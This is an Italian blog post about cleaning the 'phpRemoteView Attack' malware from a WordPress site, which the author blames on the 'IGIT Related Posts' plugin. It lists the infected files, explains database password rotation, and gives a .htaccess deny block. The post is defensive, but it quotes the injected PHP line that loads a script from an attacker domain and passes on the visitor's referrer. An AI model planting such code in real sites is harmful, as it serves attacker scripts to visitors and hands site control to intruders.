Malware WordPress: phpRemoteView Attack come rimuoverlo e proteggersi

Un pò di tempo fa, un mio amico connettendosi al mio sito mi aveva avvisato che non riusciva a navigare sul mio sito x via di un Virus / malware che gli notificava l’antivirus, eppure facendo la prova sia col mio pc che col pc di altri amici la navigazione sul mio sito era normale, senza alcun virus o malware, per verificare che effettivamente non ci fossero virus sono andato a verificare sugli “strumenti per i webmaster” di google alla pagina “diagnostica/ malware” e con sorpresa ho trovato il messaggio “Google non ha rilevato alcun malware in questo sito.”

A questo punto ero un pò più tranquillo riguardo eventuali virus o malware sul mio sito, ma, non ero convinto al 100% anche perchè il mio amico non riusciva comunque a navigare, digitando poi, per caso il mio sito da un altro pc ancora, mi sono accorto che l’antivirus mi notificava qualcosa e non mi faceva navigare in santa pace,  a questo punto dovevo riuscire a trovare il problema che poteva assillare i visitatori del sito e che in primis assillava me stesso

facendo una ricerca nella rete ho cercato un sito o un plug in per wordpress che potesse fare una scansione antivirus al mio sito, e l’ho trovato, uno strumento online che scansiona l’intero sito alla ricerca di malware e/o virus, si chiama “Sucuri site check” eccovi il link:  http://sitecheck.sucuri.net/scanner/

vi basta inserire l’indirizzo del vostro sito e premere il pulsante “Scan Website” per controllare l’intero sito, dopo qualche secondo vi appare il risultato, ecco come dovrebbe essere quando non sono stati rilevati virus/malware o codici e script dannosi:

ovviamente a me non usciva così ma pieno di codici e script dannosi che richiamavano poi un sito (nel mio caso superpuperdomain) , veniamo al dunque, il virus / malware in questione si chiama phpRemoteView Attack, in parole povere questo script dannoso permette ad altri di acquisire il pieno controllo del sito/blog wordpress, ma come ha fatto questo virus ad infettare il sito? beh sembra che tutto dipende da un plugin per wordpress installato sul mio sito, il plug in in questione si chiama “IGIT Related Posts With Thumb Image After Posts” un semplice plug in che mi permetteva di inserire gli articoli correlati con una piccola immagine dell’articolo alla fine di ogni post

in ogni caso state sempre attenti a quale plugin installate, e verificate che non infetti il vostro sito

andiamo a vedere ora dove si trova il codice dannoso e ripuliamo questa gran seccatura che ci ha dato il su detto plug in:

per prima cosa eliminate questo plugin dal vostro sito “IGIT Related Posts With Thumb Image After Posts”

poi ci serviranno:

• Codici di accesso FTP, nome utente, password e porta FTP (che potete chiedere al Supporto clienti dove avete acquistato il dominio)

• Un editor per modificare e quindi eliminare il codice dannoso dai file del sito, io ho utilizzato e continuo ad utilizzare Notepad ++ che oltretutto è un ottima alternativa al notepad di windows, se vi piace questo nuovo notepad e volete impostarlo come notepad predefinito vi rimando alla guida “Sostituire il blocco note di windows XP/Vista/Seven con Notepad++ (l’evoluzione del blocco note)“

• Un Client FTP (software per inviare e scaricare file dal proprio dominio in FTP),qui vi consiglio Filezilla, un ottimo software per l’accesso FTP

per chi non è pratico del software in questione spiego brevemente il funzionamento:

inserite i dati come Host (nome dominio), Nome utente e Password sulla barra di connessione rapida e connettetevi

nelle finestre sulla sinistra ci sono i file e le cartelle in locale (quelle del proprio PC) mentre sulla destra una volta connessi trovate i file e le cartelle del vostro sito, il mio consiglio è di scaricare l’intero sito in una cartella sul computer o in più cartelle (nel caso qualcosa dovesse andar storto avete i file originali e quindi potete ripristinare facilmente il tutto)

per fare questo basta selezionare tutte le cartelle del sito e trascinarle in una cartella sulla sinistra, in alternativa aprire la cartella appena creata in locale (sinistra), selezionare tutte le cartelle del sito(destra) e facendo clic col tasto destro selezionare “Scarica” ovviamente per caricare file sul sito si effettua il procedimento inverso dei signoli file che si vuole copiare, mentre per eliminare un file basta cliccare col tasto destro e scegliere “elimina”

in pratica quello che dovete fare è scaricare i file che sono infetti da codice dannoso, modificarli con notepad++ , salvare e inviare nuovamente i file sul sito sostituendo gli originali (infetti)

questo o simile a questo è lo script dannoso che dobbiamo eliminare:

echo ‘<script type=”text/javascript” language=”javascript” src=”http://superpuperdomain2.com/count.php?ref=’.urlencode($_SERVER['HTTP_REFERER']) .’”></script>’;

ed ecco dove si trovano i file infetti ( potrebbero essercene altri oltre a questi):

• Index.php situato nella root (directory principale) del proprio sito (“nomesito/Index.php”)

• Common.php e UDP.php presenti nella cartella wp-Admin del proprio sito( nomesito/WP-admin/Common.php )

• Config.php presente nella cartella Wp-admin/js/ del proprio sito (nomesito/wp-admin/js/config.php)

iniziate con lo scaricare il file Index, andate a modificarlo con Notepad++ ed eliminate lo script dannoso, salvate il file ed inviatelo nuovamente nella cartella dela sito, sostituendo l’originale, eliminate ora i file Common.php e UDP.php in oltre verificate l’esistenza del file config.php nella cartella “wp-admin/js/” ed eliminate anche quest’ultimo

perfetto, finalmente il phpRemoteView Attack è stato tolto dal sito ma già il fatto stesso che ci sia stato anche se solo per poche ore o giorni implica il fatto che qualcuno  potrebbe essere in possesso della password del nostro database, quindi andiamo a modificarla:

per modificare questa password dovete andare al pannello di controllo di chi gestisce il vostro dominio, e richiedere di cambiare la password attuale con una a vostra scelta ovviamente, l’operazione di modifica password durerà qualche minuto, appena le modifiche sono state apportate scaricate il file WP-config.php situato nella root del sito (nomesito/wp-config.php) e andatelo a modificare, alla riga 28 / 29 troverete:

/** Password del database MySQL */
define(‘DB_PASSWORD’, ‘la vecchia password del vostro database’);

modificate la vecchia password del database e inserite quella nuova, salvate e caricate il file sul sito sostituendo l’originale.

anche questa è fatta, ora rinforziamo le nostre difese con il file .htaccess per evitare che qualche malintenzionato possa accedere nel nostro database e crearci problemi, il file è presente nella root (directory principale) del sito (nomesito/.htaccess) :

se il file esiste potete scaricarlo e modificarlo con notepad++ incollando alla fine il codice qui sotto

se il file non esiste dovete crearlo: per farlo aprite un nuovo documento con notepad ++ e salvatelo col nome “.htaccess” (senza virgolette e col punto prima di htaccess) selezionate dall’elenco “salva come” il formato “All types (*)” altrimenti il file verrà salvato come un normale file di testo

incollate il seguente codice nel file e salvatelo

#Domini o ip blocatti
order allow,deny
deny from superpuperdomain.com
deny from superpuperdomain2.com
allow from all
#Protezione file config
<files ~ “config.php”>
order allow,deny
deny from all
</files>

caricate il file sul sito e sostituite (se già esistente) quello originale

qui la spiegazione del codice che avete appena inserito nell’htaccess:

Le righe che iniziano con il carattere # sono commenti, si possono anche eliminare
deny from serve per negare l’accesso. Ogni riga nega l’accesso a un file, a una directory o direttamente a tutto il sito. Oppure nega l’accesso a un ip o a un dominio o direttamente a tutti.
deny from superpuperdomain2.com e deny from superpuperdomain.com, impediscono l’accesso a questi due domini. Che sono i due domini che hanno attaccato il mio blog.  Al posto del nome dominio si puo inserire direttamente il ip: deny from91.220.0.15
deny from all nega l’accesso a tutti
allow fromconsente l’accesso.
allow from all consente l’accesso a tutti

come già consigliato precedentemente, fate sempre un backup per evitare che le modifiche siano irreversibili nel caso qualcosa andasse storto.

Fonte:  Victor D